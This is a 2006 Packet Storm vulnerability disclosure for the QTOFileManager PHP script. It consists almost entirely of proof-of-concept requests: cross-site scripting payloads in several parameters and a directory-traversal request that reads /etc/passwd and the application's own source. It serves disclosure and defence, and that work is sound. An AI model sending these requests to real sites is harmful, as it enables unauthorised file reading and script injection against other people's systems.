ID PACKETSTORM:48039
Type packetstorm
Reporter ellsec.org
Modified 2006-07-09T00:00:00
Description
`--------------------------
Cross Site Scripting (XSS)
--------------------------
http://target.xx/qtofm.php?delete=%3Cscript%3Ealert(%22Ellipsis%20Security%20Test%22)%3C/script%3E&u=[username]&pathext=1
http://target.xx/qtofm.php?delete=COPYING&u=[username]&pathext=%3Cscript%3Ealert(%22Ellipsis%20Security%20Test%22)%3C/script%
3E
http://target.xx/qtofm.php?u=[username]&pathext=%3Cscript%3Ealert(%22Ellipsis%20Security%20Test%22)%3C/script%3E&edit=1
http://target.xx/qtofm.php?u=[username]&pathext=1&edit=%3Cscript%3Ealert(%22Ellipsis%20Security%20Test%22)%3C/script%3E
---
POST http://target.xx:80/qtofm.php?u=[username]&pathext=1&edit=readme%2Etxt HTTP/1.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
Host: target.xx
Content-Length: 117
u=[username]&pathext=%3Cscript%3Ealert(%22Ellipsis%20Security%20Test%22)%3C/script%3E&newcontent=1&save=Save&savefile=1
--------
http://target.xx/qtofm.php?edit=../../../../../../../../../../../../etc/passwd&u=[username]&pathext=
http://target.xx/qtofm.php?edit=qtofm.php&u=[username]&pathext=
-----------------
Ellipsis Security
http://ellsec.org
`
{"sourceHref": "https://packetstormsecurity.com/files/download/48039/QTOFileManager.txt", "sourceData": "`-------------------------- \nCross Site Scripting (XSS) \n-------------------------- \nhttp://target.xx/qtofm.php?delete=%3Cscript%3Ealert(%22Ellipsis%20Security%20Test%22)%3C/script%3E&u=[username]&pathext=1 \nhttp://target.xx/qtofm.php?delete=COPYING&u=[username]&pathext=%3Cscript%3Ealert(%22Ellipsis%20Security%20Test%22)%3C/script% \n \n3E \nhttp://target.xx/qtofm.php?u=[username]&pathext=%3Cscript%3Ealert(%22Ellipsis%20Security%20Test%22)%3C/script%3E&edit=1 \nhttp://target.xx/qtofm.php?u=[username]&pathext=1&edit=%3Cscript%3Ealert(%22Ellipsis%20Security%20Test%22)%3C/script%3E \n--- \nPOST http://target.xx:80/qtofm.php?u=[username]&pathext=1&edit=readme%2Etxt HTTP/1.0 \nAccept: */* \nContent-Type: application/x-www-form-urlencoded \nHost: target.xx \nContent-Length: 117 \nu=[username]&pathext=%3Cscript%3Ealert(%22Ellipsis%20Security%20Test%22)%3C/script%3E&newcontent=1&save=Save&savefile=1 \n-------- \nhttp://target.xx/qtofm.php?edit=../../../../../../../../../../../../etc/passwd&u=[username]&pathext= \nhttp://target.xx/qtofm.php?edit=qtofm.php&u=[username]&pathext= \n----------------- \nEllipsis Security \nhttp://ellsec.org \n`\n", "edition": 1, "references": [], "modified": "2006-07-09T00:00:00", "hash": "d5ccc56166720a3cec7341b31042f29f9a53a0918d442a81774ffc85f1e155ca", "cvelist": [], "history": [], "bulletinFamily": "exploit", "href": "https://packetstormsecurity.com/files/48039/QTOFileManager.txt.html", "description": "", "id": "PACKETSTORM:48039", "reporter": "ellsec.org", "lastseen": "2016-11-03T10:21:49", "published": "2006-07-09T00:00:00", "enchantments": {"vulnersScore": 4.3}, "objectVersion": "1.2", "type": "packetstorm", "cvss": {"vector": "NONE", "score": 0.0}, "title": "QTOFileManager.txt", "viewCount": 0, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "d4be9c4fc84262b4f39f89565918568f", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "description"}, {"hash": "2c70549dc1b3820ea6d4ead9e37e5562", "key": "href"}, {"hash": "506c9e24ae2ddea054e86dc4fd6d6f07", "key": "modified"}, {"hash": "56765472680401499c79732468ba4340", "key": "objectVersion"}, {"hash": "506c9e24ae2ddea054e86dc4fd6d6f07", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "613a5a072d752f376bb723566d3bb672", "key": "reporter"}, {"hash": "8003b7a104530258eb6d6a23bac521f4", "key": "sourceData"}, {"hash": "b1ee8e8b6f258857f65b572e46488b3f", "key": "sourceHref"}, {"hash": "16e0dd622b3de71d7524939d198edb94", "key": "title"}, {"hash": "6466ca3735f647eeaed965d9e71bd35d", "key": "type"}]}
{"result": {}}
